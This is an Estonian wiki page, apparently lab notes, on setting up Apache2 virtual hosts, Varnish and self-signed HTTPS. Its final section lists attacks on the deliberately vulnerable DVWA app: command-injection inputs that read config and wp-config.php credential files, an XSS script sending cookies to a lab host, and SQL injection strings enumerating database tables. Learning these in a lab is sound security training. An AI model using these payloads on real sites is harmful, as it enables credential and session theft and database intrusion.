Virtualhost apache2 näitel: Difference between revisions
| Line 174: | Line 174: | ||
| ==SQLi== | ==SQLi== | ||
| <source lang="sql"> | <source lang="sql"> | ||
| #blind | |||
| 1' union select BENCHMARK(100000000,ENCODE('hello','goodbye')),1; # -- | 1' union select BENCHMARK(100000000,ENCODE('hello','goodbye')),1; # -- | ||
| 2' union select TABLE_SCHEMA, TABLE_NAME from information_schema.tables;# -- | 2' union select TABLE_SCHEMA, TABLE_NAME from information_schema.tables;# -- | ||
| 3' union  select TABLE_NAME,COLUMN_NAME from information_schema.columns; # -- | |||
| </source> | </source> | ||
Revision as of 14:27, 29 April 2013
/etc/hosts 192.168.56.101 www.planet.zz 192.168.56.101 sales.planet.zz
ping www.planet.zz
ping sales.planet.zz    
apt-get update     
apt-get dist-upgrade
apt-get install apache2
mkdir -p /var/www/www.planet.zz
mkdir -p /var/www/sales.planet.zz
cp /var/www/index.html /var/www/www.planet.zz
cp /var/www/index.html /var/www/sales.planet.zz
vim /var/www/www.planet.zz/index.html
vim /var/www/sales.planet.zz/index.html
cp /etc/apache2/sites-available/default /etc/apache2/sites-available/www.planet.zz
cp /etc/apache2/sites-available/default /etc/apache2/sites-available/sales.planet.zz
vim www.planet.zz 
vim sales.planet.zz 
a2ensite www.planet.zz
a2ensite sales.planet.zz 
service apache2 reload
Varnish
Esmaselt tõstame apache2 porti 8080
/etc/apache2/ports.conf NameVirtualHost *:8080 Listen 8080
cd /etc/apache2/sites-available
sed 's/:80/:8080/' default -i
sed 's/:80/:8080/' wp -i
sed 's/:80/:8080/' sales.planet.zz -i
sed 's/:80/:8080/' www.planet.zz -i
service apache2 restart
netstat -lntp
apt-get install varnish
vim /etc/default/varnish
DAEMON_OPTS="-a :80 \
             -T localhost:6082 \
             -f /etc/varnish/default.vcl \
             -S /etc/varnish/secret \
             -s malloc,256m"
Faili /etc/varnish/default.vcl lisada X-Forwarded-For sedmine
sub vcl_recv {
  # Add a unique header containing the client address
  remove req.http.X-Forwarded-For;
  set    req.http.X-Forwarded-For = client.ip;
  # [...]
}
service varnish restart
DVWA ründed
HTTPS konfigureerimine
ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa): /etc/ssl/private/www.planet.zz.key
Enter passphrase (empty for no passphrase): Enter same passphrase again: Your identification has been saved in /etc/ssl/private/www.planet.zz.key. Your public key has been saved in /etc/ssl/private/www.planet.zz.key.pub. The key fingerprint is: 76:6e:6a:b4:1b:75:7e:39:18:12:59:ee:9c:4c:b9:ef root@server The key's randomart image is: +--[ RSA 2048]----+ | . | | + . | | o + | | * o | | S + O | | ..+ + + . | | ...o o = | | o+ o . | | .o. E | +-----------------+
openssl req -new -key /etc/ssl/private/www.planet.zz.key -out /root/www.planet.zz.req
sudo openssl x509 -req -days 3650 -in /root/www.planet.zz.req -signkey /etc/ssl/private/www.planet.zz.key -out /etc/ssl/certs/www.planet.zz.pem
Signature ok subject=/C=EE/ST=Harjumaa/L=Tallinn/O=Planet/OU=IT/CN=www.planet.zz Getting Private key
cp /etc/apache2/sites-available/default-ssl /etc/apache2/sites-available/www.planet.zz-ssl
Seal muuta sisu (sert, dokument root, keyfail)
Lisa ServerName, Muuda DocumentRoot, Muuda SSLCertificateFile ja SSLCertificateKeyFile
ServerName www.planet.zz DocumentRoot /var/www/www.planet.zz SSLCertificateFile /etc/ssl/certs/www.planet.zz.pem SSLCertificateKeyFile /etc/ssl/private/www.planet.zz.key
a2enmod ssl
a2ensite www.planet.zz-ssl
service apache2 restart
ID kaart
ID kaardiga autentimine Apache2 veebiserveriga
DVWA ründed
cmd exec
8.8.8.8; sed 's/</UUUU/' ../../config/config.inc.php
8.8.8.8; ls -l 
8.8.8.8; ls -l ../
8.8.8.8; ls -l ../../
#jne, kuni kõik failid/kataloogid on teada
8.8.8.8; sed 's/<//'  ../../../../wordpress/wp-config.php
XSS
<script>var i='<img src="http://192.168.56.101/'+document.cookie+'" />'; document.write(i);</script>
veel XSSi
%3Cscript%3Evar+i%3D%27%3Cimg+src%3D%22http%3A%2F%2F192.168.56.101%2F%27%2Bdocument.cookie%2B%27%22+%2F%3E%27%3B+document.write%28i%29%3B%3C%2Fscript%3E
SQLi
#blind
1' union select BENCHMARK(100000000,ENCODE('hello','goodbye')),1; # --
2' union select TABLE_SCHEMA, TABLE_NAME from information_schema.tables;# --
3' union  select TABLE_NAME,COLUMN_NAME from information_schema.columns; # --